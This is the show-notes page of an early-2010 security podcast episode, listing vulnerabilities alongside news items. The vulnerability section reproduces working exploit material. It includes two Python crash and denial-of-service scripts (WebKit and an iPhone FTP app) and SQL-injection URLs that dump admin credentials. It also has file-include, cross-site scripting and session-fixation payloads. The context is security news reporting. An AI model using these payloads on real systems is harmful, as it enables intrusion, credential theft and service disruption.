Your daily source of Pwnage, Policy and Politics.

[display_podcast]

Episode 75 – “Zipit, Zipit Good”

Play

ISD Podcast Episode 75 for February 25, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.

Announcements:

Friends of the Podcast:
Webhosting services:WebSpeedway

Vulnerabilities of Interest:

  1. WebKit is subject to a remote memory-corruption vulnerability. An attacker can exploit this issue to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition. The following are vulnerable: Apple Safari 4.0.4, Apple Safari for the iPhone and iPod Touch and Google Chrome 4.0.249. Other versions of those browsers or other applications built using WebKit may also be affected.
    #!/usr/bin/python
    #greetz to my blackhatz and baycatz
    #iPhone CSS::Selector crash
    #this Python script acts as a web server and sends a malformed long string to the CSS <style> tag
    #this is a remote crash bug, hoever an analysis of the debug dump shows remote code execution capability, I am just lazy

    import sys, socket;

    def main():
    junk = “*>” * 120000;

    html = “”"
    <html>
    <head>
    <style>
    “”";

    html += junk;

    html += “”"
    body {background: blue;}
    </style>
    </head>
    </html>
    “”";

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
    s.bind((”,2121));
    s.listen(1);

    while True:
    channel, details = s.accept();
    print channel.recv(1024);
    channel.send(html);
    channel.close();

    main();

  2. OpenInferno OI.Blogs is subject to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input. An attacker can exploit these vulnerabilities to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. OpenInferno OI.Blogs 1.0.0 is vulnerable; other versions may also be affected.  Example URLs are available:

    http://www.sample.com/templates/loadStyles.php?theme=file%00

    http://www.sample.com/sources/javascript/loadScripts.php?scripts=[file]%00

    The following example data is available:
    javascript:document.cookie=”installerFile=[FIle];path=’/upload/admin/plugins’

  3. Softbiz Auktios is subject to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Attackers can use a browser to exploit this issue. The following example URLs are available: http://www.sample.com/auktionscript/view_items.php?id=null+union+select+1,2,3,4,5,6,7,8,9,10,concat(admin_name,0x3a,pwd),12,13,14,15,16,17,18+from+sbauctions_admin

    http://www.sample.com/auktionscript/store_info.php?id=null+union+select+1,2,3

    ,4,5,6,7,8,9,10,11,12,13,14,15,16,concat(admin_name,0x3a,pwd),18+from+sbauctions_admin#

  4. EMC HomeBase Server is subject to a remote code-execution vulnerability because it fails to properly sanitize user-supplied data. An attacker can exploit this issue to overwrite arbitrary files and execute arbitrary code with the privileges of the service. Attackers can use standard tools to exploit this issue.
  5. SavySoda WiFiFTP is subject to a remote denial-of-service vulnerability. Successful exploits may allow an attacker to prevent users from accessing files on the FTP server, resulting in a denial-of-service condition. SavySoda WiFiFTP 1 is vulnerable; other versions may also be affected.#!/usr/bin/python
    #
    # Title: iPhone – FTP Server (WiFi FTP) by SavySoda DoS/PoC
    # Date: 02-18-2010
    # Author: b0telh0
    # Link: app store (http://itunes.apple.com/br/app/ftp-server/id346724641?mt=8)
    # Tested on: iPhone 3G (firmware 3.1.3)

    # The server doesn’t crash at all, but after exploiting it
    # you can’t see (list) your files anymore. You must to close the app
    # and open it again. Then you’ll see that the app starts like it was
    # fresh installed and your files are gone.

    # root@bt:~# ./free_ftp.py 192.168.1.108
    #
    # [+] iPhone – FTP Server by SavySoda(WiFi FTP).
    # [+] Free version of WiFi FTP with Ad Support.
    #
    # [+] Connecting…
    # [+] 220 Service ready.
    #
    # [+] Sending username…
    # [+] Sending buffer…
    # [+] done!

    # root@bt:~# ftp 192.168.1.108
    # Connected to 192.168.1.108.
    # 220 Service ready.
    # Name (192.168.1.108:root): anonymous
    # 230 User logged in, proceed.
    # Remote system type is UNIX.
    # Using binary mode to transfer files.
    # ftp> ls
    # 200 Command okay.
    # 450 Requested file action not taken. File unavailable (e.g., file busy).
    # ftp> ls
    # 421 Service not available, closing control connection.
    # ftp> ls
    # Not connected.
    # ftp> bye

    import socket
    import sys
    import time

    crash = “\x41″ * 1000

    def Usage():
    print (“Usage: ./free_ftp.py serv_ip\n”)
    if len(sys.argv) <> 2:
    Usage()
    sys.exit(1)
    else:
    host = sys.argv[1]
    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
    print “\n[+] FTP Server by SavySoda(WiFi FTP).”
    print “[+] Free version of WiFi FTP with Ad Support.\n”
    print “[+] Connecting…”
    s.connect((host, 21))
    b=s.recv(1024)
    print “[+] ” +b
    except:
    print (“[-] Can’t connect to ftp server!\n”)
    sys.exit(1)
    print “[+] Sending username…”
    time.sleep(3)
    s.send(‘USER anonymous\r\n’)
    s.recv(1024)
    print “[+] Sending buffer…”
    time.sleep(3)
    s.send(‘APPE ‘ + crash + ‘\r\n’)
    s.recv(1024)
    s.close()
    print “[+] done!\n”
    sys.exit(0);

  6. Squid Web Proxy Cache is subject to a remote denial-of-service vulnerability. An attacker can exploit this issue to crash the affected application, denying service to legitimate users. An attacker may use readily available networking tools to exploit this issue.
  7. WikyBlog is subject to multiple vulnerabilities, including an arbitrary-file-upload issue, a cross-site scripting issue, a remote file-include issue, and a session-fixation issue. Attackers can exploit these issues to run arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials; Upload arbitrary PHP scripts and run them in the context of the webserver; Compromise the application and the underlying system; Hijack a user’s session and gain unauthorized access to the affected application. WikyBlog 1.7.3rc2 is vulnerable; other versions may also be affected. Example URLs are available:
    File upload:
    http://www.sample.com/Wiky/index.php/Attach/(your name)?cmd=uploadform

    Cross-site scripting:

    http://www.sample.com/Wiky/index.php/Special/Main/Templates?cmd=copy&which=<img+src=http://www.example.com/HomeComputer.jpg+onload=alert(213771818860)>

    Session fixation:

    http://www.sample.com/Wiky/index.php/Comment/Main/;jsessionid=indoushkasessionfixation

    http://www.sample.com/Wiky/index.php/Comment/Main/Home_Wiky/;jsessionid=indoushkasessionfixation

    http://www.sample.com/Wiky/index.php/Edit/Main/;jsessionid=indoushkasessionfixation

    Remote file include:

    http://www.sample.com/Wiky/include/WBmap.php?langFile=http://www.example2.com/c.txt?

News Items of Interest:
News item 1:http://www.newsweek.com/id/233916

There is no doubt about the fact that real time or historical tracking of criminals’ movement via their cell phones can come really handy to law enforcement officers. It is certain that most of them – if not all – would like to avail themselves of this opportunity in order to gain helpful information to aid them in their investigations.
According to Newsweek, some of them have. Federal magistrates around the country were asked to sign off on warrants that would allow law enforcement agencies to use cellphones as tracking devices. But, some magistrates in New York, Pennsylvania, and Texas haven’t been that forthcoming and refused to sign such requests, not being convinced about their legality.

http://cryptome.org/isp-spy/microsoft-spy.zip

News item 2: http://news.slashdot.org/story/10/02/21/2329249/Windows-7-Memory-Usage-Critic-Outed-As-Fraud
A few days ago, a report come out alleging that Windows 7 consumed more memory than it should, based on a report from Devil Mountain Software; a followup post linked to Ars Technica’s robust deconstruction of that claim. Now the story gets weird: Fred Flowers writes
The original story quoted the company’s CTO, Craig Barth on the issue. Now, InfoWorld editor in chief Eric Knorr has still more to add. From Knorr’s blog at InfoWorld.com: ‘On Friday, Feb. 19, we discovered that one of our contributors, Randall C. Kennedy, had been misrepresenting himself to other media organizations as Craig Barth, CTO of Devil Mountain Software (aka exo.performance.network), in interviews for a number of stories regarding Windows and other Microsoft software topics. … There is no Craig Barth.’ Knorr’s post goes on to say that Kennedy has been fired from his blogging gig at InfoWorld over this ‘serious breach of trust,’ and that his blog will be removed.”

Technical Segment:
http://www.irongeek.com/i.php?page=security/zipit-z2-hacking-userland-side-track

All works represented here are compiled from various sources (email, IRC, forums, and original author/websites). If the original work is copyrighted it is presented under the fair use of a copyrighted work, Copyright Act of 1976, 17 U.S.C. § 107, for purposes of criticism, comment, news reporting, teaching, and research. No use is directly intended as an infringement of copyright. Attribution is always given to the original source, if known. To have any copyrighted material removed, please contact isdpodcast[at]isdpodcast[dot]com.